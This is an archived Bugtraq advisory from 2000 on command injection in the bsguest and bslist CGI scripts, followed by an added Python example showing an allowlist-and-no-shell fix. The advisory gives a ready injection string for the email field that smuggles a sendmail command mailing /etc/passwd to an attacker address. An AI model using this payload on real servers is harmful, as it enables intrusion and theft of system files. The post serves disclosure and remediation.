Bugtraq mailing list archives

BS Scripts Vulnerabilities


From: rivendell_team () YAHOO COM
Date: Thu, 21 Dec 2000 07:19:31 -0000

++++++++++++++++++++++++++++++++++++
BS Scripts Multiple CGI Vulnerabilities
Discovered by Elf (whitehatjoe () hotmail com)
Greetz: 0x7f, CompSci, Dugnet
++++++++++++++++++++++++++++++++++++

Info

There are a couple of scripts from bsScripts
(www.stanback.net) that have holes in them
because the author did not filter out ; from the form
input.  The scripts that this affects are bsguest (a
guestbook script) and bslist (a mailing list script).
The hole allows anyone to execute commands on the
server.  The author has been informed and the holes
are now patched in the latest release.

-bsguest.cgi-

BSGuest does not filter out ; resulting in the ability for 
anyone to execute commands on the server.  The 
attacker just enters his email address 
as 'hacker () example com;/usr/sbin/sendmail 
hacker () example com < /etc/passwd', and then the 
server mails a confirmation letter along with the 
passwd file to the attacker.

-bslist.cgi-

BSList also doesn't filter out the ; and once again 
anybody can execute commands on the server.  This 
can be exploited by signing up for the mailing list with 
the email address of 

'hacker () example com;/usr/sbin/sendmail 
hacker () example com < /etc/passwd'

+++++++++++++++++++++++++++++
"It's funny how impossible dreams manifest" - 
Cypress Hill
EOF
+++++++++++++++++++++++++++++
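
The fix class for the flaw described above, as an added example that is not part of the original post and not bsScripts code: validate the submitted address against an allowlist and hand it to sendmail as a single argv element, with no shell involved. It assumes the vulnerable scripts interpolated the form field into a shell command line; the function names and the sender address are hypothetical.

```python
import re
import subprocess

SENDMAIL = "/usr/sbin/sendmail"  # path as it appears in the advisory

# Allowlist rather than a blacklist of ';': only characters that can appear
# in an ordinary address are accepted, so ; | ` $ < > quotes, whitespace and
# newlines are all rejected without being enumerated one by one.
_ADDR_RE = re.compile(
    r"[A-Za-z0-9][A-Za-z0-9._%+-]{0,63}"                 # local part, no leading '-'
    r"@[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"    # first domain label
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)+"  # further labels
)


def is_valid_address(addr):
    """True only if the whole string is one plain address."""
    # fullmatch() also rejects a trailing newline, which match() with '$' would allow.
    return (
        isinstance(addr, str)
        and len(addr) <= 254
        and _ADDR_RE.fullmatch(addr) is not None
    )


def sendmail_argv(addr):
    """Build the argument vector; the address is one argv element, never shell text."""
    if not is_valid_address(addr):
        raise ValueError("rejected address")
    # '--' ends option parsing, so the recipient can never be read as a flag.
    return [SENDMAIL, "-i", "--", addr]


def send_confirmation(addr, body, sender="guestbook@example.org"):
    """Send the confirmation mail without a shell (sender is a placeholder)."""
    message = f"From: {sender}\nTo: {addr}\nSubject: Confirmation\n\n{body}\n"
    # A list argv with the default shell=False means no /bin/sh parses the input.
    subprocess.run(sendmail_argv(addr), input=message.encode(), check=True)
```

Either control alone would stop the input shown in the post; using both keeps the script safe if the pattern is later loosened.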
